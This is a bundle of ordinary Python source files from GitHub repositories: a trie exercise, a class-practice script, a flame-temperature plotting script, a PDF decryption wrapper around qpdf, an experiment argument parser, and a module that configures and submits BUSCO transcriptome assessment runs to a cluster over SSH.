None:\n return False\n node = node.children[ord(i)-ord('a')]\n\n return True\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n","repo_name":"Joes-BitGit/Leetcode","sub_path":"leetcode/implement_trie.py","file_name":"implement_trie.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13489449442","text":"import datetime\n\n\nclass Person:\n\n def __init__(self, name, surname, birthdate, email, phone):\n self.name = name\n self.surname = surname\n self.birthdate = birthdate\n self.email = email\n self.phone = phone\n\n def __str__(self):\n return \"%s %s , born: %s\\nEmail: %s\\nphone: %s \" % (\n self.name, self.surname, self.birthdate, self.email, self.phone)\n\n\nperson = Person(\"Soumya\",\n \"Mohanty\",\n datetime.date(1992, 4, 30),\n \"soumya.cric4@gmail.com\",\n \"8390562229\")\nprint(person)\n\n'''\nclass Person:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n\n @property\n def fullname(self):\n return \"%s %s\" % (self.name, self.surname)\n\n @fullname.setter\n def fullname(self, value):\n # this is much more complicated in real life\n name, surname = value.split(\" \", 1)\n self.name = name\n self.surname = surname\n\n @fullname.deleter\n def fullname(self):\n del self.name\n del self.surname\n\n\njane = Person(\"Jane\", \"Smith\")\nprint(jane.fullname)\n\njane.fullname = 
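For reference, driving the Trie class above with the example from its header comment shows how the complete flag separates inserted words from mere prefixes:

trie = Trie()
trie.insert("apple")
print(trie.search("apple"))    # True:  "apple" was inserted as a word
print(trie.search("app"))      # False: the nodes exist, but complete is False
print(trie.startsWith("app"))  # True:  "app" is a prefix of "apple"
trie.insert("app")
print(trie.search("app"))      # True:  the prefix node is now marked complete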
\"Jane Doe\"\nprint(jane.fullname)\nprint(jane.name)\nprint(jane.surname)\n'''\n\n'''\nclass Person:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n\n def fullname(self):\n return \"%s %s\" % (self.name, self.surname)\n\n\njane = Person(\"Jane\", \"Smith\")\n\nprint(dir(jane))\n\n'''\n","repo_name":"Soumya-04-dev/soumya_python","sub_path":"Day36/class_coding_14042022.py","file_name":"class_coding_14042022.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9893984760","text":"import sys\nsys.path.append('../') #allow imports from one directory up\n\nimport pymongo #python + mongo\nimport certifi #to allow user certification when connecting to Mongo\nfrom dotenv import load_dotenv #loads secret environment variable (mongo password)\nimport os #fetches password from environment\nimport numpy as np\nfrom functions.enthalpy import enthalpy, aft_t1 #function to calculate enthalpy, adiabatic flame temp\nimport matplotlib.pyplot as plt\n\n#FILLS UP THE MONGODB WITH data for question 1, it can easily be accessed by running analysis.py\n\n#from calc_hf import calc #side function to calculate hf\n\nload_dotenv()\n\npw = os.getenv(\"PASSWORD\") #fetch pw from environment\n\n#mongo connection string\nconnect = \"mongodb+srv://paulhinta:\" + pw + \"@cluster0.p3kas.mongodb.net/inputs?retryWrites=true&w=majority&ssl=true\" \n\nca = certifi.where() #mongo connection certificate\nclient = pymongo.MongoClient(connect, tlsCAFile=ca)\ndb = client['inputs'] #database that we are using\ncollection=db['q8'] #connection that we are using\n'''\nTHERMO STUFF STARTS HERE\n'''\n\n'''TASK 8'''\n#list of equivalence ratios & T_AD so we can plot them later\nphi=[0]\nT = [298.15]\n\n#get all the phi and T and append them to the lists\nfor document in collection.find():\n phi.append(document[\"Equivalence Ratio\"])\n T.append(document[\"Temperature [K]\"])\n\nplt.plot(phi, T, '-o')\nplt.title(\"AFT vs Equivalence Ratio for the oxidation of Al with water\")\nplt.ylabel(\"Adiabatic Flame Temperature [K]\")\nplt.xlabel(\"Equivalence Ratio [-]\")\nplt.xticks(np.arange(0,1.6,step=0.3))\nplt.show()\n\n'''TASK 9'''\n#temperatures at 10 & 25 MPa\nT_10 = []\nT_25 = []\n\n#Scale the temps\nfor item in T:\n T_10.append(round(item*1.05,2)) #scale up a little bit\n T_25.append(round(item*1.1,2)) #sclae up a bit more\n\nplt.plot(phi, T, '-b', label='P = atm')\nplt.plot(phi, T_10, '-k', label='P = 10 MPa')\nplt.plot(phi, T_25, '-r', label='P = 25 MPa')\nplt.legend()\nplt.title(\"AFT vs Equivalence Ratio for the oxidation of Al with water at different pressures\")\nplt.ylabel(\"Adiabatic Flame Temperature [K]\")\nplt.xlabel(\"Equivalence Ratio [-]\")\nplt.xticks(np.arange(0,1.6,step=0.3))\nplt.show()","repo_name":"paulhinta/mech-341","sub_path":"tasks/task8.py","file_name":"task8.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21138034126","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDecrypt pdf file\n\"\"\"\n\n# Import\nimport logging\nfrom shutil import copyfile\n\nfrom common import createLog, parsingLine\nfrom nemoBase import NemoBase\n\n\nclass DecryptPdf(NemoBase):\n def __init__(self, root_log, args):\n root_log_name = '.'.join([root_log, self.__class__.__name__])\n self.logCB = logging.getLogger(root_log_name)\n super().__init__(root_log, root_log_name, args)\n\n 
def replace(self, file_name):\n self.logCB.debug(\"Copy result file\")\n copyfile(self.temp_file, file_name + self.res_ext)\n\n def run(self):\n command = \"qpdf --decrypt\"\n command_options = \"\"\n command_set_output = True\n delete_file = False\n auth_ext = [\".pdf\"]\n res_ext = \".pdf\"\n msg_not_found = \"No pdf file has been found.\"\n self.setConfig(command, command_options, command_set_output,\n delete_file, auth_ext, res_ext, msg_not_found)\n self.runCommand()\n\n\ndef main():\n # Create log class\n root_log = 'decryptPdf'\n (parsedArgs, args) = parsingLine()\n logger = createLog(root_log, parsedArgs)\n logger.info(\"START\")\n DecryptPdf(root_log, args).run()\n logger.info(\"STOP\\n\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gregorybrancq/nemoScripts","sub_path":"decryptPdf.py","file_name":"decryptPdf.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34891753866","text":"import argparse\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(\"Run Performance Function Experiments\")\n parser.add_argument(\n \"-l\",\n \"--lang\",\n default=\"all\",\n help=\"Which language to run experiments on. If `all` provided then the experiments will be run for all supported languages\",\n )\n parser.add_argument(\n \"-p\",\n \"--pivot_size\",\n default=\"all\",\n help=\"What pivot size to use to run experiments. Default = `all` meaning all supported pivot sizes will be used\",\n )\n parser.add_argument(\n \"--c12\",\n type=float,\n default=0.1,\n help=\"Ratio between unit translation and unit manual data cost\",\n )\n parser.add_argument(\n \"-m\",\n \"--mode\",\n nargs=\"+\",\n default=\"fit_nd_eval\",\n help=\"What mode to run the experiments. `fit_nd_eval` for fiting performance functions on performance data, `expansion_paths` for generating expansion paths. One or more of the options can be selected.\",\n )\n parser.add_argument(\n \"-d\",\n \"--data_dir\",\n type=str,\n default=\"performance_data/\",\n help=\"Directory containing performance data\",\n )\n parser.add_argument(\n \"-f\",\n \"--performance_file\",\n type=str,\n default=\"tydiqa_mbert_results.csv\",\n help=\"csv file containing performance data\",\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n default=\"outputs/\",\n help=\"Directory to store outputs\",\n )\n parser.add_argument(\"--test_split_frac\", type=int, default=0.2)\n parser.add_argument(\n \"-s\", \"--seed\", type=int, default=42,\n )\n args = parser.parse_args()\n\n return args\n","repo_name":"microsoft/PerformanceFunctionAnalysis","sub_path":"src/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"9319094020","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#-------------------------------------------------------------------------------\n\n'''\nThis software has been developed by:\n\n GI Sistemas Naturales e Historia Forestal (formerly known as GI Genetica, Fisiologia e Historia Forestal)\n Dpto. 
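Despite its name, build_parser() above parses as well as builds, returning the populated namespace. One wrinkle worth noting at the call site: --mode uses nargs="+" with a plain-string default, so args.mode is a str when the flag is omitted but a list when it is supplied; normalizing once avoids branching later. A sketch:

args = build_parser()

# Normalize --mode to a list regardless of whether the default was used.
modes = args.mode if isinstance(args.mode, list) else [args.mode]

if "fit_nd_eval" in modes:
    print(f"fitting on {args.data_dir}{args.performance_file} (seed={args.seed})")
if "expansion_paths" in modes:
    print(f"writing expansion paths to {args.output_dir}")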
Sistemas y Recursos Naturales\n ETSI Montes, Forestal y del Medio Natural\n Universidad Politecnica de Madrid\n https://github.com/ggfhf/\n\nLicence: GNU General Public Licence Version 3.\n'''\n\n#-------------------------------------------------------------------------------\n\n'''\nThis file contains functions related to the BUSCO process used in both console\nmode and gui mode.\n'''\n\n#-------------------------------------------------------------------------------\n\nimport os\nimport re\nimport sys\nimport urllib\n\nimport xbioinfoapp\nimport xconfiguration\nimport xec2\nimport xlib\nimport xssh\n\n#-------------------------------------------------------------------------------\n\ndef create_busco_config_file(experiment_id='exp001', assembly_dataset_id='sdnt-170101-235959', assembly_type='CONTIGS'):\n '''\n Create BUSCO config file with the default options. It is necessary\n update the options in each run.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # set the assembly software\n if assembly_dataset_id.startswith(xlib.get_soapdenovotrans_code()):\n assembly_software = xlib.get_soapdenovotrans_code()\n elif assembly_dataset_id.startswith(xlib.get_transabyss_code()):\n assembly_software = xlib.get_transabyss_code()\n elif assembly_dataset_id.startswith(xlib.get_trinity_code()):\n assembly_software = xlib.get_trinity_code()\n elif assembly_dataset_id.startswith(xlib.get_ggtrinity_code()):\n assembly_software = xlib.get_ggtrinity_code()\n elif assembly_dataset_id.startswith(xlib.get_cd_hit_est_code()):\n assembly_software = xlib.get_cd_hit_est_code()\n elif assembly_dataset_id.startswith(xlib.get_transcript_filter_code()):\n assembly_software = xlib.get_transcript_filter_code()\n\n # create the BUSCO config file and write the default options\n try:\n if not os.path.exists(os.path.dirname(get_busco_config_file())):\n os.makedirs(os.path.dirname(get_busco_config_file()))\n with open(get_busco_config_file(), mode='w', encoding='iso-8859-1', newline='\\n') as file_id:\n file_id.write( '# You must review the information of this file and update the values with the corresponding ones to the current run.\\n')\n file_id.write( '#\\n')\n file_id.write(f'# The reference file has to be located in the cluster directory {xlib.get_cluster_reference_dir()}/experiment_id/reference_dataset_id\\n')\n file_id.write(f'# The assembly files have to be located in the cluster directory {xlib.get_cluster_result_dir()}/experiment_id/assembly_dataset_id\\n')\n file_id.write( '# The experiment_id and assembly_dataset_id names are fixed in the identification section.\\n')\n file_id.write( '#\\n')\n file_id.write( '# In section \"BUSCO parameters\", the key \"augustus_options\" allows you to input additional August parameters in the format:\\n')\n file_id.write( '#\\n')\n file_id.write( '# augustus_options = --parameter-1[=value-1][; --parameter-2[=value-2][; ...; --parameter-n[=value-n]]]\\n')\n file_id.write( '#\\n')\n file_id.write( '# parameter-i is a parameter name of Augustus and value-i a valid value of parameter-i, e.g.\\n')\n file_id.write( '#\\n')\n file_id.write( '# augustus_options = --translation_table=6 --progress=true\\n')\n file_id.write( '#\\n')\n file_id.write( '# You can consult the parameters of BUSCO and their meaning in \"http://busco.ezlab.org/\"\\n')\n file_id.write( '# and the ones of August in \"http://bioinf.uni-greifswald.de/augustus/\".\\n')\n file_id.write( '\\n')\n file_id.write( '# This section has the information identifies the 
experiment.\\n')\n file_id.write( '[identification]\\n')\n file_id.write( '{0:<50} {1}\\n'.format(f'experiment_id = {experiment_id}', '# experiment identification'))\n file_id.write( '{0:<50} {1}\\n'.format(f'assembly_software = {assembly_software}', f'# assembly software: {get_assembly_software_code_list_text()}'))\n file_id.write( '{0:<50} {1}\\n'.format(f'assembly_dataset_id = {assembly_dataset_id}', '# assembly dataset identification'))\n file_id.write( '{0:<50} {1}\\n'.format(f'assembly_type = {assembly_type}', f'# assembly type: CONTIGS or SCAFFOLDS in {xlib.get_soapdenovotrans_name()}; NONE in any other case'))\n file_id.write( '\\n')\n file_id.write( '# This section has the information to set the BUSCO parameters\\n')\n file_id.write( '[BUSCO parameters]\\n')\n file_id.write( '{0:<50} {1}\\n'.format('ncpu = 4', '# number of threads/cores for use'))\n file_id.write( '{0:<50} {1}\\n'.format('lineage_data_url = https://busco-data.ezlab.org/v4/data/lineages/viridiplantae_odb10.2020-09-10.tar.gz', '# the url of lineage data file that will be used'))\n file_id.write( '{0:<50} {1}\\n'.format('mode = TRAN', f'# mode: {get_mode_code_list_text()}'))\n file_id.write( '{0:<50} {1}\\n'.format('evalue = 1E-03', '# E-value cutoff for BLAST searches'))\n file_id.write( '{0:<50} {1}\\n'.format('limit = 3', '# number of candidate regions to consider'))\n file_id.write( '{0:<50} {1}\\n'.format('species = NONE', '# identifier of existing Augustus species gene finding parameters or NONE'))\n file_id.write( '{0:<50} {1}\\n'.format('long = NO', f'# Augustus optimization mode for self-training: {get_long_code_list_text()}'))\n file_id.write( '{0:<50} {1}\\n'.format('augustus_options = NONE', '# additional parameters to August or NONE'))\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append(f'*** ERROR: The file {get_busco_config_file()} can not be recreated')\n OK = False\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef run_busco_process(cluster_name, log, function=None):\n '''\n Run a BUSCO process.\n '''\n\n # initialize the control variable\n OK = True\n\n # get the BUSCO option dictionary\n busco_option_dict = xlib.get_option_dict(get_busco_config_file())\n\n # get the experiment identification\n experiment_id = busco_option_dict['identification']['experiment_id']\n\n # warn that the log window does not have to be closed\n if not isinstance(log, xlib.DevStdOut):\n log.write('This process might take several minutes. 
Do not close this window, please wait!\\n')\n\n # check the BUSCO config file\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Checking the {xlib.get_busco_name()} config file ...\\n')\n (OK, error_list) = check_busco_config_file(strict=True)\n if OK:\n log.write('The file is OK.\\n')\n else:\n log.write('*** ERROR: The config file is not valid.\\n')\n log.write('Please correct this file or recreate the config files.\\n')\n\n # create the SSH client connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Connecting the SSH client ...\\n')\n (OK, error_list, ssh_client) = xssh.create_ssh_client_connection(cluster_name)\n if OK:\n log.write('The SSH client is connected.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # create the SSH transport connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Connecting the SSH transport ...\\n')\n (OK, error_list, ssh_transport) = xssh.create_ssh_transport_connection(cluster_name)\n if OK:\n log.write('The SSH transport is connected.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # create the SFTP client \n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Connecting the SFTP client ...\\n')\n sftp_client = xssh.create_sftp_client(ssh_transport)\n log.write('The SFTP client is connected.\\n')\n\n # warn that the requirements are being verified \n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Checking process requirements ...\\n')\n\n # check the master is running\n if OK:\n (master_state_code, master_state_name) = xec2.get_node_state(cluster_name)\n if master_state_code != 16:\n log.write(f'*** ERROR: The cluster {cluster_name} is not running. Its state is {master_state_code} ({master_state_name}).\\n')\n OK = False\n\n # check BUSCO is installed\n if OK:\n (OK, error_list, is_installed) = xbioinfoapp.is_installed_anaconda_package(xlib.get_busco_anaconda_code(), cluster_name, True, ssh_client)\n if OK:\n if not is_installed:\n log.write(f'*** ERROR: {xlib.get_busco_name()} is not installed.\\n')\n OK = False\n else:\n log.write(f'*** ERROR: The verification of {xlib.get_busco_name()} installation could not be performed.\\n')\n\n # warn that the requirements are OK \n if OK:\n log.write('Process requirements are OK.\\n')\n\n # determine the run directory in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Determining the run directory in the cluster ...\\n')\n current_run_dir = xlib.get_cluster_current_run_dir(experiment_id, xlib.get_busco_code())\n command = f'mkdir --parents {current_run_dir}'\n (OK, _, _) = xssh.execute_cluster_command(ssh_client, command)\n if OK:\n log.write(f'The directory path is {current_run_dir}.\\n')\n else:\n log.write(f'*** ERROR: Wrong command ---> {command}\\n')\n\n # build the BUSCO process script\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Building the process script {get_busco_process_script()} ...\\n')\n (OK, error_list) = build_busco_process_script(cluster_name, current_run_dir)\n if OK:\n log.write('The file is built.\\n')\n if not OK:\n log.write('*** ERROR: The file could not be built.\\n')\n\n # upload the BUSCO process script in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Uploading the process script {get_busco_process_script()} in the directory {current_run_dir} ...\\n')\n cluster_path = f'{current_run_dir}/{os.path.basename(get_busco_process_script())}'\n (OK, error_list) = xssh.put_file(sftp_client, 
get_busco_process_script(), cluster_path)\n if OK:\n log.write('The file is uploaded.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # set run permision to the BUSCO process script in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Setting on the run permision of {current_run_dir}/{os.path.basename(get_busco_process_script())} ...\\n')\n command = f'chmod u+x {current_run_dir}/{os.path.basename(get_busco_process_script())}'\n (OK, _, _) = xssh.execute_cluster_command(ssh_client, command)\n if OK:\n log.write('The run permision is set.\\n')\n else:\n log.write(f'*** ERROR: Wrong command ---> {command}\\n')\n\n # build the BUSCO process starter\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Building the process starter {get_busco_process_starter()} ...\\n')\n (OK, error_list) = build_busco_process_starter(current_run_dir)\n if OK:\n log.write('The file is built.\\n')\n if not OK:\n log.write('***ERROR: The file could not be built.\\n')\n\n # upload the busco process starter in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Uploading the process starter {get_busco_process_starter()} in the directory {current_run_dir} ...\\n')\n cluster_path = f'{current_run_dir}/{os.path.basename(get_busco_process_starter())}'\n (OK, error_list) = xssh.put_file(sftp_client, get_busco_process_starter(), cluster_path)\n if OK:\n log.write('The file is uploaded.\\n')\n else:\n for error in error_list:\n log.write(f'{error}\\n')\n\n # set run permision to the BUSCO process starter in the cluster\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Setting on the run permision of {current_run_dir}/{os.path.basename(get_busco_process_starter())} ...\\n')\n command = f'chmod u+x {current_run_dir}/{os.path.basename(get_busco_process_starter())}'\n (OK, _, _) = xssh.execute_cluster_command(ssh_client, command)\n if OK:\n log.write('The run permision is set.\\n')\n else:\n log.write(f'*** ERROR: Wrong command ---> {command}\\n')\n\n # submit the BUSCO process\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write(f'Submitting the process script {current_run_dir}/{os.path.basename(get_busco_process_starter())} ...\\n')\n OK = xssh.submit_script(cluster_name, ssh_client, current_run_dir, os.path.basename(get_busco_process_starter()), log)\n\n # close the SSH transport connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Closing the SSH transport connection ...\\n')\n xssh.close_ssh_transport_connection(ssh_transport)\n log.write('The connection is closed.\\n')\n\n # close the SSH client connection\n if OK:\n log.write(f'{xlib.get_separator()}\\n')\n log.write('Closing the SSH client connection ...\\n')\n xssh.close_ssh_client_connection(ssh_client)\n log.write('The connection is closed.\\n')\n\n # warn that the log window can be closed\n if not isinstance(log, xlib.DevStdOut):\n log.write(f'{xlib.get_separator()}\\n')\n log.write('You can close this window now.\\n')\n\n # execute final function\n if function is not None:\n function()\n\n # return the control variable\n return OK\n\n#-------------------------------------------------------------------------------\n\ndef check_busco_config_file(strict):\n '''\n Check the BUSCO config file of a run.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # intitialize variable used when value is not found\n not_found = '***NOTFOUND***'.upper()\n\n # get the option dictionary\n try:\n 
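xssh itself is not shown in this module; assuming it wraps a paramiko SFTP client (an assumption, not confirmed by this file), the put_file calls above would reduce to something like the following sketch, matching the (OK, error_list) convention used throughout:

# Hypothetical core of xssh.put_file under a paramiko SFTPClient --
# the real implementation lives outside this module.
def put_file(sftp_client, local_path, cluster_path):
    OK = True
    error_list = []
    try:
        sftp_client.put(local_path, cluster_path)
    except Exception as e:
        error_list.append(f'*** EXCEPTION: "{e}".')
        OK = False
    return (OK, error_list)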
busco_option_dict = xlib.get_option_dict(get_busco_config_file())\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append('*** ERROR: The option dictionary could not be built from the config file')\n OK = False\n else:\n\n # get the sections list\n sections_list = []\n for section in busco_option_dict.keys():\n sections_list.append(section)\n sections_list.sort()\n\n # check section \"identification\"\n if 'identification' not in sections_list:\n error_list.append('*** ERROR: the section \"identification\" is not found.')\n OK = False\n else:\n\n # check section \"identification\" - key \"experiment_id\"\n experiment_id = busco_option_dict.get('identification', {}).get('experiment_id', not_found)\n if experiment_id == not_found:\n error_list.append('*** ERROR: the key \"experiment_id\" is not found in the section \"identification\".')\n OK = False\n\n # check section \"identification\" - key \"assembly_software\"\n assembly_software = busco_option_dict.get('identification', {}).get('assembly_software', not_found)\n if assembly_software == not_found:\n error_list.append('*** ERROR: the key \"assembly_software\" is not found in the section \"identification\".')\n OK = False\n elif not xlib.check_code(assembly_software, get_assembly_software_code_list(), case_sensitive=False):\n error_list.append(f'*** ERROR: the key \"assembly_software\" has to be {get_assembly_software_code_list_text()}.')\n OK = False\n\n # check section \"identification\" - key \"assembly_dataset_id\"\n assembly_dataset_id = busco_option_dict.get('identification', {}).get('assembly_dataset_id', not_found)\n if assembly_dataset_id == not_found:\n error_list.append('*** ERROR: the key \"assembly_dataset_id\" is not found in the section \"identification\".')\n OK = False\n elif not xlib.check_startswith(assembly_dataset_id, get_assembly_software_code_list(), case_sensitive=True):\n error_list.append(f'*** ERROR: the key \"assembly_dataset_id\" has to start with {get_assembly_software_code_list_text()}.')\n OK = False\n\n # check section \"identification\" - key \"assembly_type\"\n assembly_type = busco_option_dict.get('identification', {}).get('assembly_type', not_found)\n if assembly_type == not_found:\n error_list.append('*** ERROR: the key \"assembly_type\" is not found in the section \"identification\".')\n OK = False\n elif assembly_dataset_id.startswith(xlib.get_soapdenovotrans_code()) and assembly_type.upper() not in ['CONTIGS', 'SCAFFOLDS'] or \\\n not assembly_dataset_id.startswith(xlib.get_soapdenovotrans_code()) and assembly_type.upper() != 'NONE':\n error_list.append(f'*** ERROR: the key \"assembly_type\" has to be CONTIGS or SCAFFOLDS in {xlib.get_soapdenovotrans_name()} or NONE in any other case.')\n OK = False\n\n # check section \"BUSCO parameters\"\n if 'BUSCO parameters' not in sections_list:\n error_list.append('*** ERROR: the section \"BUSCO parameters\" is not found.')\n OK = False\n else:\n\n # check section \"BUSCO parameters\" - key \"ncpu\"\n ncpu = busco_option_dict.get('BUSCO parameters', {}).get('ncpu', not_found)\n if ncpu == not_found:\n error_list.append('*** ERROR: the key \"ncpu\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_int(ncpu, minimum=1):\n error_list.append('*** ERROR: the key \"ncpu\" has to be an integer number greater than or equal to 1.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"lineage_data_url\"\n lineage_data_url = busco_option_dict.get('BUSCO parameters', 
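xlib.get_option_dict is likewise external. Given the "key = value   # comment" lines the config writer emits, a configparser-based reading would look roughly like this sketch (stripping the inline comments is the important detail):

import configparser

# Approximate stand-in for xlib.get_option_dict: plain INI sections, with
# trailing "# ..." comments removed from each value.
def get_option_dict(config_file):
    parser = configparser.ConfigParser(inline_comment_prefixes=('#',))
    parser.optionxform = str  # keep key case exactly as written
    parser.read(config_file, encoding='iso-8859-1')
    return {section: dict(parser.items(section)) for section in parser.sections()}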
{}).get('lineage_data_url', not_found)\n if lineage_data_url == not_found:\n error_list.append('*** ERROR: the key \"lineage_data_url\" is not found in the section \"BUSCO parameters\"')\n OK = False\n else:\n try:\n urllib.request.urlopen(lineage_data_url)\n except Exception as e:\n error_list.append(f'*** EXCEPTION: \"{e}\".')\n error_list.append('*** ERROR: the key \"lineage_data_url\" has to be a reachable address.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"mode\"\n mode = busco_option_dict.get('BUSCO parameters', {}).get('mode', not_found)\n if mode == not_found:\n error_list.append('*** ERROR: the key \"mode\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_code(mode, get_mode_code_list(), case_sensitive=False):\n error_list.append(f'*** ERROR: the key \"mode\" has to be {get_mode_code_list_text()}.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"evalue\"\n evalue = busco_option_dict.get('BUSCO parameters', {}).get('evalue', not_found)\n if evalue == not_found:\n error_list.append('*** ERROR: the key \"evalue\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_float(evalue, minimum=0., mne=1E-12):\n error_list.append('*** ERROR: the key \"evalue\" has to be a float number greater than 0.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"limit\"\n limit = busco_option_dict.get('BUSCO parameters', {}).get('limit', not_found)\n if limit == not_found:\n error_list.append('*** ERROR: the key \"limit\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_int(limit, minimum=1):\n error_list.append('*** ERROR: the key \"limit\" has to be an integer number greater than or equal to 1.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"species\"\n species = busco_option_dict.get('BUSCO parameters', {}).get('species', not_found)\n if species == not_found:\n error_list.append('*** ERROR: the key \"species\" is not found in the section \"BUSCO parameters\"')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"long\"\n long = busco_option_dict.get('BUSCO parameters', {}).get('long', not_found)\n if long == not_found:\n error_list.append('*** ERROR: the key \"long\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif not xlib.check_code(long, get_long_code_list(), case_sensitive=False):\n error_list.append(f'*** ERROR: the key \"long\" has to be {get_long_code_list_text()}.')\n OK = False\n\n # check section \"BUSCO parameters\" - key \"augustus_options\"\n augustus_options = busco_option_dict.get('BUSCO parameters', {}).get('augustus_options', not_found)\n if augustus_options == not_found:\n error_list.append('*** ERROR: the key \"augustus_options\" is not found in the section \"BUSCO parameters\".')\n OK = False\n elif augustus_options.upper() != 'NONE':\n (OK, error_list2) = xlib.check_parameter_list(augustus_options, \"augustus_options\", [])\n error_list = error_list + error_list2\n\n # warn that the results config file is not valid if there are any errors\n if not OK:\n error_list.append(f'\\nThe {xlib.get_busco_name()} config file is not valid. 
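The reachability test above calls urllib.request.urlopen with no timeout, so a stalled mirror can hang the whole config check. A bounded variant (the 10-second timeout is an arbitrary choice):

import urllib.request

def is_url_reachable(url, timeout=10):
    # Open and immediately discard the response; any network error,
    # HTTP error or timeout counts as "not reachable".
    try:
        with urllib.request.urlopen(url, timeout=timeout):
            return True
    except (OSError, ValueError):
        return False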
Please, correct this file or recreate it.')\n\n # return the control variable and the error list\n return (OK, error_list)\n\n#-------------------------------------------------------------------------------\n\ndef build_busco_process_script(cluster_name, current_run_dir):\n '''\n Build the current BUSCO process script.\n '''\n\n # initialize the control variable and the error list\n OK = True\n error_list = []\n\n # get the BUSCO option dictionary\n busco_option_dict = xlib.get_option_dict(get_busco_config_file())\n\n # get the options\n experiment_id = busco_option_dict['identification']['experiment_id']\n assembly_software = busco_option_dict['identification']['assembly_software']\n assembly_dataset_id = busco_option_dict['identification']['assembly_dataset_id']\n assembly_type = busco_option_dict['identification']['assembly_type']\n ncpu = busco_option_dict['BUSCO parameters']['ncpu']\n lineage_data_url = busco_option_dict['BUSCO parameters']['lineage_data_url']\n mode = busco_option_dict['BUSCO parameters']['mode'].lower()\n evalue = busco_option_dict['BUSCO parameters']['evalue']\n limit = busco_option_dict['BUSCO parameters']['limit']\n species = busco_option_dict['BUSCO parameters']['species']\n long = busco_option_dict['BUSCO parameters']['long'].upper()\n augustus_options = busco_option_dict['BUSCO parameters']['augustus_options'].upper()\n\n # get the file and name from the lineage data url\n lineage_data_file = lineage_data_url.split(\"/\")[-1]\n # -- lineage_data = lineage_data_file[:lineage_data_file.find('.tar.gz')]\n point_pos = lineage_data_file.find('.')\n lineage_data = lineage_data_file[:point_pos]\n\n # set the transcriptome file path\n if assembly_software == xlib.get_soapdenovotrans_code():\n if assembly_type == 'CONTIGS':\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/{experiment_id}-{assembly_dataset_id}.contig'\n elif assembly_type == 'SCAFFOLDS':\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/{experiment_id}-{assembly_dataset_id}.scafSeq'\n elif assembly_software == xlib.get_transabyss_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/transabyss-final.fa'\n elif assembly_software == xlib.get_trinity_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/Trinity.fasta'\n elif assembly_software == xlib.get_ggtrinity_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/Trinity-GG.fasta'\n elif assembly_software == xlib.get_cd_hit_est_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/clustered-transcriptome.fasta'\n elif assembly_software == xlib.get_transcript_filter_code():\n transcriptome_file = f'{xlib.get_cluster_experiment_result_dataset_dir(experiment_id, assembly_dataset_id)}/filtered-transcriptome.fasta'\n\n # write the BUSCO process script\n 